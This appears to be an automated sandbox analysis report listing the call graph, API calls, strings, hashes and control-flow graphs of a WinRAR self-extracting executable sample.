FindClose 21474->21481 21485 40d9c6 3 API calls 21474->21485 21491 40ec50 SendMessageW 21474->21491 21493 40e842 _memset _wcslen 21474->21493 21495 411bd1 CompareStringW 21474->21495 21520 419a10 GetCurrentDirectoryW 21474->21520 21475->21474 21477 40eb15 RegQueryValueExW RegCloseKey 21475->21477 21476->21474 21477->21474 21478->21474 21479->21474 21480 40e847 SetFileAttributesW 21482 40e905 GetFileAttributesW 21480->21482 21480->21493 21481->21474 21484 40e913 DeleteFileW 21482->21484 21482->21493 21483 40a6ec 102 API calls 21483->21493 21484->21493 21487 40ec0f GetDlgItem SetWindowTextW SendMessageW 21485->21487 21486 40952e 7 API calls 21486->21493 21487->21474 21488 401b74 _swprintf 101 API calls 21489 40e945 GetFileAttributesW 21488->21489 21490 40e956 MoveFileW 21489->21490 21489->21493 21492 40e96e MoveFileExW 21490->21492 21490->21493 21491->21474 21492->21493 21493->21474 21493->21480 21493->21483 21493->21486 21493->21488 21494 40e8e1 SHFileOperationW 21493->21494 21494->21482 21495->21474 21498 40e322 _memset _wcslen __write_nolock 21496->21498 21497 40e52f 21497->21474 21498->21497 21499 40e40b 21498->21499 21521 411bd1 CompareStringW 21498->21521 21500 4091c5 4 API calls 21499->21500 21502 40e41e 21500->21502 21503 40e43f ShellExecuteExW 21502->21503 21522 40a928 21502->21522 21503->21497 21505 40e451 21503->21505 21507 40e490 WaitForInputIdle 21505->21507 21508 40e479 IsWindowVisible 21505->21508 21509 40e4d1 CloseHandle 21505->21509 21506 40e436 21506->21503 21530 40d707 WaitForSingleObject 21507->21530 21508->21507 21510 40e486 ShowWindow 21508->21510 21513 40e4df 21509->21513 21518 40e4ec 21509->21518 21510->21507 21534 411bd1 CompareStringW 21513->21534 21514 40e4ae GetExitCodeProcess 21514->21509 21516 40e4bf 21514->21516 21516->21509 21517 40e4cc 21516->21517 21517->21509 21518->21497 21519 40e528 ShowWindow 21518->21519 21519->21497 21520->21474 21521->21499 21523 40a935 __write_nolock 21522->21523 21524 40a948 GetFullPathNameW 21523->21524 21529 40a998 21523->21529 21525 40a969 21524->21525 21526 40a77b 2 API calls 21525->21526 21525->21529 21527 40a97d 21526->21527 21528 40a981 GetFullPathNameW 21527->21528 21527->21529 21528->21529 21529->21506 21531 40d73c 21530->21531 21532 40d740 21531->21532 21533 40d723 PeekMessageW WaitForSingleObject 21531->21533 21532->21509 21532->21514 21533->21531 21534->21518 22363 420e3f 22370 42516e 22363->22370 22366 420e52 22367 41a27a _realloc 67 API calls 22366->22367 22369 420e5d 22367->22369 22383 425094 22370->22383 22372 420e44 22372->22366 22373 424f45 22372->22373 22374 424f51 __close 22373->22374 22375 41ed53 __lock 67 API calls 22374->22375 22377 424f5d 22375->22377 22376 424fc6 22424 424fdb 22376->22424 22377->22376 22381 424f9b DeleteCriticalSection 22377->22381 22411 426d66 22377->22411 22379 424fd2 __close 22379->22366 22382 41a27a _realloc 67 API calls 22381->22382 22382->22377 22384 4250a0 __close 22383->22384 22385 41ed53 __lock 67 API calls 22384->22385 22387 4250af 22385->22387 22386 425147 22393 425165 22386->22393 22387->22386 22392 42504c 105 API calls __fflush_nolock 22387->22392 22396 420ea0 22387->22396 22401 425136 22387->22401 22390 425153 __close 22390->22372 22392->22387 22404 41ec79 LeaveCriticalSection 22393->22404 22395 42516c 22395->22390 22397 420ec3 EnterCriticalSection 22396->22397 22398 420ead 22396->22398 22397->22387 22399 41ed53 __lock 67 API calls 22398->22399 22400 420eb6 22399->22400 22400->22387 22405 420f0e 22401->22405 22403 425144 22403->22387 22404->22395 22406 420f31 LeaveCriticalSection 22405->22406 22407 420f1e 22405->22407 22406->22403 22410 41ec79 LeaveCriticalSection 22407->22410 22409 420f2e 22409->22403 22410->22409 22412 426d72 __close 22411->22412 22413 426da3 22412->22413 22414 426d86 22412->22414 22420 426d9b __close 22413->22420 22427 420e5f 22413->22427 22415 41eb5e __free_osfhnd 67 API calls 22414->22415 22417 426d8b 22415->22417 22419 41feb3 __close 6 API calls 22417->22419 22419->22420 22420->22377 22674 41ec79 LeaveCriticalSection 22424->22674 22426 424fe2 22426->22379 22428 420e93 EnterCriticalSection 22427->22428 22429 420e71 22427->22429 22432 420e89 22428->22432 22429->22428 22430 420e79 22429->22430 22431 41ed53 __lock 67 API calls 22430->22431 22431->22432 22433 426cef 22432->22433 22434 426d03 22433->22434 22435 426d1f 22433->22435 22436 41eb5e __free_osfhnd 67 API calls 22434->22436 22442 426d18 22435->22442 22452 424fe4 22435->22452 22437 426d08 22436->22437 22440 41feb3 __close 6 API calls 22437->22440 22440->22442 22449 426dda 22442->22449 22447 426d3f 22447->22442 22448 41a27a _realloc 67 API calls 22447->22448 22448->22442 22667 420ed2 22449->22667 22451 426de0 22451->22420 22453 424ffd 22452->22453 22457 42501f 22452->22457 22454 424ba7 __fileno 67 API calls 22453->22454 22453->22457 22455 425018 22454->22455 22491 424a1e 22455->22491 22458 428f59 22457->22458 22459 426d33 22458->22459 22460 428f69 22458->22460 22462 424ba7 22459->22462 22460->22459 22461 41a27a _realloc 67 API calls 22460->22461 22461->22459 22463 424bcb 22462->22463 22464 424bb6 22462->22464 22468 426f5f 22463->22468 22465 41eb5e __free_osfhnd 67 API calls 22464->22465 22466 424bbb 22465->22466 22467 41feb3 __close 6 API calls 22466->22467 22467->22463 22469 426f6b __close 22468->22469 22470 426f73 22469->22470 22471 426f8e 22469->22471 22472 41eb71 __free_osfhnd 67 API calls 22470->22472 22473 426f9c 22471->22473 22478 426fdd 22471->22478 22474 426f78 22472->22474 22475 41eb71 __free_osfhnd 67 API calls 22473->22475 22476 41eb5e __free_osfhnd 67 API calls 22474->22476 22477 426fa1 22475->22477 22488 426f80 __close 22476->22488 22480 41eb5e __free_osfhnd 67 API calls 22477->22480 22479 4265f6 ___lock_fhandle 68 API calls 22478->22479 22481 426fe3 22479->22481 22482 426fa8 22480->22482 22483 426ff0 22481->22483 22484 426ffe 22481->22484 22485 41feb3 __close 6 API calls 22482->22485 22639 426ec3 22483->22639 22487 41eb5e __free_osfhnd 67 API calls 22484->22487 22485->22488 22489 426ff8 22487->22489 22488->22447 22654 427022 22489->22654 22492 424a2a __close 22491->22492 22493 424a32 22492->22493 22494 424a4d 22492->22494 22516 41eb71 22493->22516 22496 424a5b 22494->22496 22499 424a9c 22494->22499 22498 41eb71 __free_osfhnd 67 API calls 22496->22498 22501 424a60 22498->22501 22519 4265f6 22499->22519 22500 41eb5e __free_osfhnd 67 API calls 22509 424a3f __close 22500->22509 22503 41eb5e __free_osfhnd 67 API calls 22501->22503 22505 424a67 22503->22505 22504 424aa2 22506 424ac5 22504->22506 22507 424aaf 22504->22507 22508 41feb3 __close 6 API calls 22505->22508 22511 41eb5e __free_osfhnd 67 API calls 22506->22511 22529 4242eb 22507->22529 22508->22509 22509->22457 22513 424aca 22511->22513 22512 424abd 22588 424af0 22512->22588 22514 41eb71 __free_osfhnd 67 API calls 22513->22514 22514->22512 22517 41e6eb __getptd_noexit 67 API calls 22516->22517 22518 41eb76 22517->22518 22518->22500 22520 426602 __close 22519->22520 22521 42665d 22520->22521 22524 41ed53 __lock 67 API calls 22520->22524 22522 426662 EnterCriticalSection 22521->22522 22523 42667f __close 22521->22523 22522->22523 22523->22504 22525 42662e 22524->22525 22526 426645 22525->22526 22528 423f96 __mtinitlocknum InitializeCriticalSectionAndSpinCount 22525->22528 22591 42668d 22526->22591 22528->22526 22530 4242fa __write_nolock 22529->22530 22531 424353 22530->22531 22532 42432c 22530->22532 22561 424321 22530->22561 22535 424395 22531->22535 22536 4243bb 22531->22536 22534 41eb71 __free_osfhnd 67 API calls 22532->22534 22533 41e48e __atodbl_l 5 API calls 22537 424a1c 22533->22537 22538 424331 22534->22538 22539 41eb71 __free_osfhnd 67 API calls 22535->22539 22540 4243cf 22536->22540 22595 42414d 22536->22595 22537->22512 22541 41eb5e __free_osfhnd 67 API calls 22538->22541 22542 42439a 22539->22542 22605 424b43 22540->22605 22544 424338 22541->22544 22546 41eb5e __free_osfhnd 67 API calls 22542->22546 22547 41feb3 __close 6 API calls 22544->22547 22549 4243a3 22546->22549 22547->22561 22548 4243da 22550 424680 22548->22550 22552 41e764 __getptd 67 API calls 22548->22552 22551 41feb3 __close 6 API calls 22549->22551 22553 424690 22550->22553 22554 42494f WriteFile 22550->22554 22551->22561 22555 4243f5 GetConsoleMode 22552->22555 22557 42476e 22553->22557 22577 4246a4 22553->22577 22556 424982 GetLastError 22554->22556 22585 424662 22554->22585 22555->22550 22559 424420 22555->22559 22556->22585 22576 42484e 22557->22576 22580 42477d 22557->22580 22558 4249cd 22558->22561 22563 41eb5e __free_osfhnd 67 API calls 22558->22563 22559->22550 22560 424432 GetConsoleCP 22559->22560 22562 424455 22560->22562 22560->22585 22561->22533 22562->22556 22582 424e95 79 API calls __fassign 22562->22582 22583 4266bd 11 API calls __putwch_nolock 22562->22583 22584 424501 WideCharToMultiByte 22562->22584 22562->22585 22587 424586 WriteFile 22562->22587 22614 42257b 22562->22614 22566 4249f0 22563->22566 22564 4249a0 22568 4249ab 22564->22568 22569 4249bf 22564->22569 22565 424712 WriteFile 22565->22556 22565->22577 22572 41eb71 __free_osfhnd 67 API calls 22566->22572 22567 4248b4 WideCharToMultiByte 22567->22556 22574 4248eb WriteFile 22567->22574 22573 41eb5e __free_osfhnd 67 API calls 22568->22573 22617 41eb84 22569->22617 22570 4247f2 WriteFile 22570->22556 22570->22580 22572->22561 22578 4249b0 22573->22578 22575 424922 GetLastError 22574->22575 22574->22576 22575->22576 22576->22558 22576->22567 22576->22574 22576->22585 22577->22558 22577->22565 22577->22585 22579 41eb71 __free_osfhnd 67 API calls 22578->22579 22579->22561 22580->22558 22580->22570 22580->22585 22582->22562 22583->22562 22584->22585 22586 424532 WriteFile 22584->22586 22585->22558 22585->22561 22585->22564 22586->22556 22586->22562 22587->22556 22587->22562 22638 426696 LeaveCriticalSection 22588->22638 22590 424af8 22590->22509 22594 41ec79 LeaveCriticalSection 22591->22594 22593 426694 22593->22521 22594->22593 22622 42657f 22595->22622 22597 42416b 22598 424173 22597->22598 22599 424184 SetFilePointer 22597->22599 22600 41eb5e __free_osfhnd 67 API calls 22598->22600 22601 42419c GetLastError 22599->22601 22603 424178 22599->22603 22600->22603 22602 4241a6 22601->22602 22601->22603 22604 41eb84 __dosmaperr 67 API calls 22602->22604 22603->22540 22604->22603 22606 424b50 22605->22606 22607 424b5f 22605->22607 22608 41eb5e __free_osfhnd 67 API calls 22606->22608 22610 424b83 22607->22610 22611 41eb5e __free_osfhnd 67 API calls 22607->22611 22609 424b55 22608->22609 22609->22548 22610->22548 22612 424b73 22611->22612 22613 41feb3 __close 6 API calls 22612->22613 22613->22610 22635 422543 22614->22635 22618 41eb71 __free_osfhnd 67 API calls 22617->22618 22619 41eb8f _realloc 22618->22619 22620 41eb5e __free_osfhnd 67 API calls 22619->22620 22621 41eba2 22620->22621 22621->22561 22623 42658c 22622->22623 22625 4265a4 22622->22625 22624 41eb71 __free_osfhnd 67 API calls 22623->22624 22626 426591 22624->22626 22627 41eb71 __free_osfhnd 67 API calls 22625->22627 22630 4265e9 22625->22630 22629 41eb5e __free_osfhnd 67 API calls 22626->22629 22628 4265d2 22627->22628 22631 41eb5e __free_osfhnd 67 API calls 22628->22631 22632 426599 22629->22632 22630->22597 22633 4265d9 22631->22633 22632->22597 22634 41feb3 __close 6 API calls 22633->22634 22634->22630 22636 41ce78 _LocaleUpdate::_LocaleUpdate 77 API calls 22635->22636 22637 422556 22636->22637 22637->22562 22638->22590 22640 42657f __close_nolock 67 API calls 22639->22640 22643 426ed3 22640->22643 22641 426f29 22657 4264f9 22641->22657 22643->22641 22644 426f07 22643->22644 22646 42657f __close_nolock 67 API calls 22643->22646 22644->22641 22647 42657f __close_nolock 67 API calls 22644->22647 22649 426efe 22646->22649 22650 426f13 CloseHandle 22647->22650 22648 426f53 22648->22489 22653 42657f __close_nolock 67 API calls 22649->22653 22650->22641 22651 426f1f GetLastError 22650->22651 22651->22641 22652 41eb84 __dosmaperr 67 API calls 22652->22648 22653->22644 22666 426696 LeaveCriticalSection 22654->22666 22656 42702a 22656->22488 22658 426565 22657->22658 22659 42650a 22657->22659 22660 41eb5e __free_osfhnd 67 API calls 22658->22660 22659->22658 22665 426535 22659->22665 22661 42656a 22660->22661 22662 41eb71 __free_osfhnd 67 API calls 22661->22662 22663 42655b 22662->22663 22663->22648 22663->22652 22664 426555 SetStdHandle 22664->22663 22665->22663 22665->22664 22666->22656 22668 420f02 LeaveCriticalSection 22667->22668 22669 420ee3 22667->22669 22668->22451 22669->22668 22670 420eea 22669->22670 22673 41ec79 LeaveCriticalSection 22670->22673 22672 420eff 22672->22451 22673->22672 22674->22426

                                                                                  Executed Functions

                                                                                  Function 0040FCFB Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 161filecomwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 00410BE8: GetModuleHandleW.KERNEL32(kernel32,0040FD0B,00000001), ref: 00410BED
                                                                                    • Part of subcall function 00410BE8: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00410BFD
                                                                                  • OleInitialize.OLE32(00000000), ref: 0040FD0E
                                                                                    • Part of subcall function 00411CC7: GetCPInfo.KERNEL32(00000000,?,?,?,?,0040FD1E), ref: 00411CD8
                                                                                    • Part of subcall function 00411CC7: IsDBCSLeadByte.KERNEL32(00000000), ref: 00411CEC
                                                                                  • _memset.LIBCMT ref: 0040FD2A
                                                                                  • GetCommandLineW.KERNEL32 ref: 0040FD32
                                                                                  • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0040FD58
                                                                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007002), ref: 0040FD6A
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040FD93
                                                                                    • Part of subcall function 0040D4A7: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0040D4C0
                                                                                    • Part of subcall function 0040D4A7: SetEnvironmentVariableW.KERNEL32(sfxpar,00000002,00000000,00000000,?,?,00000400), ref: 0040D4F3
                                                                                  • CloseHandle.KERNEL32(?), ref: 0040FD9C
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00438820,00000800), ref: 0040FDB6
                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxname,00438820), ref: 0040FDC2
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040FDC9
                                                                                  • LoadIconW.USER32(00000000,00000064), ref: 0040FDE0
                                                                                  • LoadBitmapW.USER32(00000065), ref: 0040FDF3
                                                                                  • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,0040F436,00000000), ref: 0040FE52
                                                                                  • DeleteObject.GDI32 ref: 0040FEB3
                                                                                  • DeleteObject.GDI32(?), ref: 0040FEBF
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040FEFC
                                                                                  • Sleep.KERNEL32(?), ref: 0040FF0C
                                                                                  • OleUninitialize.OLE32 ref: 0040FF12
                                                                                    • Part of subcall function 0040D4FB: CharUpperW.USER32(?,?,?,?,00000400), ref: 0040D55C
                                                                                    • Part of subcall function 0040D4FB: CharUpperW.USER32(?,?,?,?,?,00000400), ref: 0040D583
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileHandle$EnvironmentModuleVariable$CharCloseDeleteLoadObjectUpperView$AddressBitmapByteCommandDialogIconInfoInitializeLeadLineMappingNameOpenParamProcSleepUninitializeUnmap_memset
                                                                                  • String ID: STARTDLG$sfxname$winrarsfxmappingfile.tmp
                                                                                  • API String ID: 3055076122-2503671248
                                                                                  • Opcode ID: a22acdb766a7c0e52184bb8b612a7c1dc45bd1962d25c885258a70212aff553f
                                                                                  • Instruction ID: f4f22b9ba360d764c944beb667196f2bea3764b9e46d0abae360175085c82a8e
                                                                                  • Opcode Fuzzy Hash: a22acdb766a7c0e52184bb8b612a7c1dc45bd1962d25c885258a70212aff553f
                                                                                  • Instruction Fuzzy Hash: 4C51A570A00204EFC724BFB1ED8A96E7AA9EB45314B50443FF505A32A1DB7C4955CBAD
                                                                                  Function 00401D01 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 769COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00401D06
                                                                                  • _strlen.LIBCMT ref: 00402277
                                                                                    • Part of subcall function 004118AD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,00001FFF,?,?,004022FC,00000000,?,00000800,?,00001FFF,?), ref: 004118C9
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004023D3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                  • String ID: CMT
                                                                                  • API String ID: 1706572503-2756464174
                                                                                  • Opcode ID: aa2f60ddcec8fd2efd3fda57f68e11ada5fb96b913be5de19f4ea4d0439c56d0
                                                                                  • Instruction ID: 9442b8194121d703088a8fabf333f0c3befbc1c42b6ea704bbd0c6a07644fbaa
                                                                                  • Opcode Fuzzy Hash: aa2f60ddcec8fd2efd3fda57f68e11ada5fb96b913be5de19f4ea4d0439c56d0
                                                                                  • Instruction Fuzzy Hash: 406211709006848FCF15DF64C899BEE7BB1AF14304F08447FE986AB2C6DB785985CB68
                                                                                  Function 00409396 Relevance: 7.6, APIs: 5, Instructions: 111fileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1022 409396-4093b9 call 41a860 1025 409425-409430 FindNextFileW 1022->1025 1026 4093bb-4093cc FindFirstFileW 1022->1026 1027 409432-409442 GetLastError 1025->1027 1028 409448-40944c 1025->1028 1029 409452-409518 call 410951 call 40a40a call 41a940 call 4110a4 * 3 1026->1029 1030 4093d2-4093e4 call 40a77b 1026->1030 1027->1028 1028->1029 1031 40951d-40952b 1028->1031 1029->1031 1037 4093e6-4093fc FindFirstFileW 1030->1037 1038 4093fe-409407 GetLastError 1030->1038 1037->1029 1037->1038 1040 409418 1038->1040 1041 409409-40940c 1038->1041 1042 40941a-409420 1040->1042 1041->1040 1044 40940e-409411 1041->1044 1042->1031 1044->1040 1046 409413-409416 1044->1046 1046->1042
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNELBASE(?,?,00000800,?,?,?,00409605,000000FF,?,?,?,?,00408331,?,?,00000000), ref: 004093C4
                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,00409605,000000FF,?,?,?,?,00408331,?,?,00000000), ref: 004093F4
                                                                                  • GetLastError.KERNEL32(?,?,00000800,?,00409605,000000FF,?,?,?,?,00408331,?,?,00000000,?,00000800), ref: 004093FE
                                                                                  • FindNextFileW.KERNEL32(000000FF,?,00000800,?,?,?,00409605,000000FF,?,?,?,?,00408331,?,?,00000000), ref: 00409428
                                                                                  • GetLastError.KERNEL32(?,00409605,000000FF,?,?,?,?,00408331,?,?,00000000,?,00000800), ref: 00409436
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$ErrorFirstLast$Next
                                                                                  • String ID:
                                                                                  • API String ID: 869497890-0
                                                                                  • Opcode ID: 5046d3256f54a4eb14f67afb25d84d6bd2b79aa0e406bc94fe027f4d8763a26c
                                                                                  • Instruction ID: 3bd6e1595cc40084cd7e2c41453e8846b53c8c10c675e8f8304b93ed0838cd52
                                                                                  • Opcode Fuzzy Hash: 5046d3256f54a4eb14f67afb25d84d6bd2b79aa0e406bc94fe027f4d8763a26c
                                                                                  • Instruction Fuzzy Hash: B7416F719006549BCB20DF28CC84ADA77F8BF48350F10466AF56EE2291D774AAC5CF54
                                                                                  Function 00417AED Relevance: 2.6, APIs: 1, Instructions: 1055COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID:
                                                                                  • API String ID: 2102423945-0
                                                                                  • Opcode ID: 7889950b6ae447eba384dc39c4309f2808af0eef35d2d8dcdc64f6cf0a8ad92c
                                                                                  • Instruction ID: 32ee2a2af2c0316917a2b5ad144b093d5dc149cfb96975b6bee9dbb568e54f8d
                                                                                  • Opcode Fuzzy Hash: 7889950b6ae447eba384dc39c4309f2808af0eef35d2d8dcdc64f6cf0a8ad92c
                                                                                  • Instruction Fuzzy Hash: 7A92E3709087859FCB29CF34C4C06E9BBF1AF55308F18C5AED8968B342D739A985CB59
                                                                                  Function 0040F436 Relevance: 102.1, APIs: 49, Strings: 9, Instructions: 646COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 40f436-40f469 call 41a250 call 41a860 call 4060e6 7 40f473-40f47c 0->7 8 40f46b-40f46e 0->8 10 40f482-40f483 7->10 11 40fa19-40fa2c 7->11 9 40fceb-40fcf8 8->9 12 40f494-40f496 10->12 13 40f485-40f48a 10->13 14 40fa3d-40fa44 11->14 15 40fa2e-40fa37 SendMessageW 11->15 18 40fcea 12->18 16 40f4f1-40f50d GetDlgItemTextW 13->16 17 40f48c-40f48d 13->17 19 40fa56-40faa1 call 40da71 GetDlgItem SendMessageW call 419a10 GetDlgItem 14->19 20 40fa46-40fa50 SendDlgItemMessageW 14->20 15->14 22 40f525-40f52b 16->22 23 40f50f-40f515 16->23 24 40f4cd-40f4da 17->24 25 40f48f-40f492 17->25 18->9 53 40faa3 19->53 54 40faa9-40fadc SetWindowTextW call 419a27 call 40e608 19->54 20->19 31 40f53c-40f54e GetDlgItem 22->31 32 40f52d-40f537 22->32 29 40f517 23->29 30 40f51e-40f520 23->30 27 40f4e0-40f4e6 24->27 28 40f8c7 24->28 25->12 33 40f49b-40f4b2 call 40c271 call 4050e0 25->33 36 40f4ec 27->36 37 40f8cf-40f8d2 27->37 35 40f8c8-40f8c9 EndDialog 28->35 29->30 30->35 39 40f550-40f571 SendMessageW * 2 31->39 40 40f576-40f585 SetFocus 31->40 38 40f9a4-40f9aa 32->38 33->37 61 40f4b8-40f4c8 SetDlgItemTextW 33->61 35->37 36->28 37->18 42 40f9b0-40f9b6 38->42 43 40fbb2-40fbba KiUserCallbackDispatcher 38->43 39->40 45 40f593-40f5da call 410951 call 40dc2e call 40c271 call 401b74 40->45 46 40f587-40f591 call 40c271 40->46 42->43 50 40f9bc-40f9de call 40c271 SetDlgItemTextW 42->50 52 40fce8 43->52 60 40f5e0-40f5ed call 40d148 45->60 46->60 65 40f9e0-40f9e5 50->65 66 40f9e7-40f9f3 50->66 52->18 53->54 76 40faec-40faf2 54->76 77 40fade-40fae7 call 40e700 54->77 78 40f5fb-40f60d call 40927f 60->78 79 40f5ef-40f5f6 call 40d93c 60->79 61->37 70 40f9f9-40fa14 call 40c271 * 2 MessageBoxW 65->70 66->70 70->52 84 40fb20-40fb22 76->84 85 40faf4-40fb1e call 40c271 SetDlgItemTextW call 40c271 SetDlgItemTextW 76->85 77->76 93 40f623-40f634 call 4199fd 78->93 94 40f60f-40f618 GetLastError 78->94 79->78 88 40fb23-40fb29 84->88 85->88 95 40fbcc-40fbd2 88->95 96 40fb2f-40fb37 call 40e700 88->96 113 40f645-40f64b 93->113 114 40f636-40f63f GetLastError 93->114 99 40f61a-40f61d 94->99 100 40f61f 94->100 103 40fc75-40fc7c 95->103 104 40fbd8-40fbde 95->104 106 40fb3c-40fb43 96->106 99->93 99->100 100->93 109 40fc88-40fc8e 103->109 110 40fc7e-40fc82 EnableWindow 103->110 104->103 108 40fbe4-40fbea 104->108 111 40fb70-40fb76 106->111 112 40fb45-40fb4b 106->112 108->103 115 40fbf0-40fbfe 108->115 116 40fc90-40fc9d call 4060a3 * 2 109->116 117 40fca2-40fca9 109->117 110->109 126 40fb78-40fb85 SetForegroundWindow 111->126 127 40fbbf-40fbc7 call 40e700 111->127 112->111 120 40fb4d-40fb6f call 419812 call 41a27a 112->120 123 40f6b5-40f6b8 113->123 124 40f64d-40f650 113->124 114->113 121 40f641 114->121 122 40fc01-40fc04 115->122 116->117 118 40fcab-40fcb1 117->118 119 40fccd-40fcd3 117->119 118->119 129 40fcb3-40fcbd 118->129 119->52 131 40fcd5-40fce2 call 40c271 SetDlgItemTextW 119->131 120->111 121->113 135 40fc06-40fc0c 122->135 136 40fc0e-40fc15 122->136 132 40f8d7-40f91f call 4060c1 * 2 call 4060a3 call 4060c1 SetDlgItemTextW GetDlgItem 123->132 133 40f6be-40f6c4 123->133 137 40f652-40f68b GetTickCount call 401b74 call 4086a6 call 408843 124->137 138 40f6c9-40f6d3 124->138 126->127 128 40fb87-40fb8d 126->128 127->95 128->127 140 40fb8f-40fba9 DialogBoxParamW 128->140 141 40fcc7 PostMessageW 129->141 142 40fcbf-40fcc5 SendMessageW 129->142 131->52 205 40f921-40f935 GetWindowLongW SetWindowLongW 132->205 206 40f93b-40f976 call 40e700 * 2 call 40e187 call 40e700 132->206 133->138 145 40f6c6 133->145 135->136 147 40fc49-40fc53 135->147 150 40fc17-40fc1d 136->150 151 40fc1f-40fc48 call 41a53d call 40c271 call 41a53d 136->151 185 40f690-40f695 137->185 148 40f6d9-40f788 GetModuleFileNameW call 40ceac call 401b74 CreateFileMappingW 138->148 149 40f86f-40f8c1 call 40c271 call 401b74 call 4062b2 call 40c271 MessageBoxW 138->149 140->127 158 40fbab 140->158 141->119 142->119 145->138 147->122 154 40fc55-40fc74 call 419812 147->154 181 40f78a-40f798 GetCommandLineW 148->181 182 40f7ee-40f81e ShellExecuteExW call 40ce55 * 2 148->182 149->28 150->147 150->151 151->147 154->103 158->43 188 40f7aa-40f7eb call 40d0c2 * 3 